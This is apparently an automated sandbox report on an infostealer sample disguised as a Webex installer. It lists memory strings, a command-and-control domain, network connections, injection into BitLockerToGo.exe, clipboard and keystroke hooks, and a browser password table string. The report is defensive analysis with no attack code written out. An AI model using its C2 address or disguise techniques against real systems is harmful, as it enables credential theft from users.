              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: gFCeeWNTvZ.exeString found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwordsA
              Source: BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/
              Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/&
              Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/-
              Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/1
              Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/api
              Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apiDUv
              Source: BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apiaHD
              Source: BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apid1
              Source: BitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apies
              Source: BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apili
              Source: BitLockerToGo.exe, 00000002.00000003.1953178352.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949408201.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apipf
              Source: BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/apix
              Source: BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/ckz
              Source: BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/g
              Source: BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/h
              Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs/z
              Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rottieud.sbs:443/apitPd
              Source: BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62520 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62521 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62522 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62524
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62525
              Source: unknownNetwork traffic detected: HTTP traffic on port 62525 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62524 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62523 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62520
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62521
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62522
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62523
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62520 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62521 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62522 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62523 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62524 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62525 version: TLS 1.2
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,0_2_646053ED
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64605394 glfwSetClipboardString,MultiByteToWideChar,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_64605394
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,0_2_646053ED
              Source: gFCeeWNTvZ.exeBinary or memory string: PFN_DirectInput8Create
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dllJump to behavior
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460BA76 RegisterRawInputDevices,0_2_6460BA76
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_6460B019 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_6460B019
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1276707C0_3_1276707C
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_12762C400_3_12762C40
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_12762F330_3_12762F33
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_12764BE80_3_12764BE8
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_127633D80_3_127633D8
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_3_1276A4A50_3_1276A4A5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0052D1002_2_0052D100
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0053039D2_2_0053039D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0055C4202_2_0055C420
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005454232_2_00545423
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005456FF2_2_005456FF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005406E02_2_005406E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005457092_2_00545709
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005528802_2_00552880
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0052D9AE2_2_0052D9AE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00552AC02_2_00552AC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0053BAE02_2_0053BAE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0055CCE02_2_0055CCE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00536F522_2_00536F52
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00528FD02_2_00528FD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005230702_2_00523070
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0052A0752_2_0052A075
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005450E52_2_005450E5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005560902_2_00556090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005261102_2_00526110
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054A1F02_2_0054A1F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005521E02_2_005521E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005592702_2_00559270
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005272602_2_00527260
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005292002_2_00529200
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005423502_2_00542350
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005313102_2_00531310
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0055A3202_2_0055A320
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0052B3A02_2_0052B3A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005363A02_2_005363A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005454452_2_00545445
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005514162_2_00551416
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0053E4D02_2_0053E4D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054A4902_2_0054A490
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054650E2_2_0054650E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005465CF2_2_005465CF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054859D2_2_0054859D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005386702_2_00538670
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0053C6E02_2_0053C6E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054C6E02_2_0054C6E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005416992_2_00541699
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054B7542_2_0054B754
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0055C7002_2_0055C700
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005267202_2_00526720
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005598302_2_00559830
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005568F02_2_005568F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005258EA2_2_005258EA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0055C9F02_2_0055C9F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054C9A02_2_0054C9A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00523A702_2_00523A70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00535A612_2_00535A61
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00559A302_2_00559A30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0054BBF42_2_0054BBF4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00522CC02_2_00522CC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0053ACB02_2_0053ACB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00546D422_2_00546D42
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00549D742_2_00549D74
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00527D702_2_00527D70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00526DD02_2_00526DD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00545DD82_2_00545DD8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00559E302_2_00559E30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00529E802_2_00529E80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_005454232_2_00545423
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00551F802_2_00551F80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00533950 appears 93 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00528840 appears 75 times
              Source: glfw.3927611081.dll.0.drStatic PE information: Number of sections : 17 > 10
              Source: gFCeeWNTvZ.exe, 00000000.00000000.1676763992.0000000001B60000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWebex_webex.meet1405.com_e561a3ad-4f21-4bff-900c-12a703623e2d@LrzwSIrPhI_15d8e1d6-9c79-4b49-8fe7-af157539a3fb.exeH& vs gFCeeWNTvZ.exe
              Source: gFCeeWNTvZ.exeBinary or memory string: OriginalFilenameWebex_webex.meet1405.com_e561a3ad-4f21-4bff-900c-12a703623e2d@LrzwSIrPhI_15d8e1d6-9c79-4b49-8fe7-af157539a3fb.exeH& vs gFCeeWNTvZ.exe
              Source: gFCeeWNTvZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeCode function: 0_2_64608298 LoadImageW,GetLastError,FormatMessageW,WideCharToMultiByte,0_2_64608298
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeFile created: C:\Users\user\AppData\Local\Temp\glfw.3927611081.dllJump to behavior
              Source: gFCeeWNTvZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\gFCeeWNTvZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: gFCeeWNTvZ.exe, 00000000.00000002.1865649432.0000000001210000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: insert into __Index2_Expr values($1, $2)invalid file offset %d (should be <= %d)io.File directory missing ReadDir methodline %d: field %s already set in type %smalformed MIME header: missing colon: %qmarkWorkerStop: unknown mark worker modemax: cannot accept %v (value if type %T)min: cannot accept %v (value if type %T)mismatched scale ratios, got %d, want %dmultipart: unexpected line in Next(): %qmust be able to track idle limiter eventnot required, not desired, not necessarynumber of arguments exceeds maximum! %dopencensus.io/http/client/received_bytesopencensus.io/http/client/response_bytesopencensus.io/http/server/response_bytesoverlap: the params should be array typeoversized record received with length %dpayload ended before LEB128 was finishedpkcs7: payload is not signedData contentports not allowed with file URLs: got %vquotedprintable: invalid hex byte 0x%02xrefill of span with free space remainingreflect.Value.Call: call of nil functionreflect.Value.Call: wrong argument countreflect.Value.SetBytes of non-byte slicereflect.Value.setRunes of non-rune slicereflect: FieldByName of non-struct type reflect: bad layout computation in MapOfreturnsoutputsinputsreceviedbypassUNUSEDrsa: internal error: inconsistent lengthruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative precsum: cannot accept %v (value if type %T)t_version: param base type is not stringtime.Time year outside of range [0,9999]time: Stop called on uninitialized Timertls: received empty certificates messagetoo many invalid names, aborting parsingunsupported flag %q in tag %q of type %suuid: UUID must be exactly 16 bytes longwrong source type for join table handlerwrong type (%s) for received field %s.%sx509: cannot parse IP address of length x509: malformed extension critical fieldxml: trailing '>' in field %s of type %s{{.Field}} must be greater than {{.Min}}%s slice too big: %d elements of %d bytes(?i)^(-?\d+(?:\.\d+)?)\s?([KMGTPE]B?|B?)$(file-007) corrupted DB: first chunk link(file-011) corrupted DB: first chunk link(file-014) corrupted DB: first chunk data34694469519536141888238489627838134765625A sampling of all past memory allocationsInuktitut (Syllabics) Canada (iu-Cans-CA)MapIter.Next called on exhausted iteratorNo decoder provided for content type '%s'Option ,inline needs a struct value fieldSELECT content FROM (%s) WHERE path == $1Time.UnmarshalBinary: unsupported versionUrdu Islamic Republic Of Pakistan (ur-PK)Used block at offset %#x: Nonzero paddingUyghur People's Republic Of China (ug-CN)` VirtualSize is extremely large > 256MiBasn1: internal error in parseTagAndLengthattempt to eliminate additional providersattempted to add zero-sized address rangebinary: varint overflows a 64-bit integerbytes.Buffer.WriteTo: invalid Write countbytes.Reader.WriteTo: invalid Write countcan't call pointe
              Source: BitLockerToGo.exe, 00000002.00000003.1891638344.0000000004E04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: gFCeeWNTvZ.exeVirustotal: Detection: 11%
              Source: gFCeeWNTvZ.exeString found in binary or memory: ^[A-Z]{3}[ ]?\d{2,4}$^\+[1-9]?[0-9]{7,14}$^\d{4,5}|\d{3}-\d{4}$after top-level valuearray_subscript_errorasync stack too largebad number syntax: %qbad type in compare: bigint AUTO_INCREMENTblock device requiredbufio: negative countcaching_sha2_passwordcannot marshal type: cardinality_violationcheckdead: runnable gconcurrent map writescorrupted h265 packetdavinci-instruct-betadebug-include/excludedecompression failuredefer on system stackdiagnostics_exceptiondoes not have outputsexec: already startedexpect object or nullexpected DOCUMENT-ENDexpected STREAM-STARTextended echo requestfdw_invalid_data_typefeature_not_supportedfield value not validfinal calculate flowsfindrunnable: wrong pflag %q begins with -flush buffered writerforeign_key_violationfound unknown field: frame_ping_has_streamglGetIntegerui64i_vNVglVertexAttribPointerglfwGetPrimaryMonitorgorm:update_interfacehttp: Handler timeouthttp: invalid patternimage: unknown formatin string escape codeincomplete field nameinvalid JPEG format: invalid NumericStringinvalid emitter stateinvalid named captureinvalid nesting depthinvalid 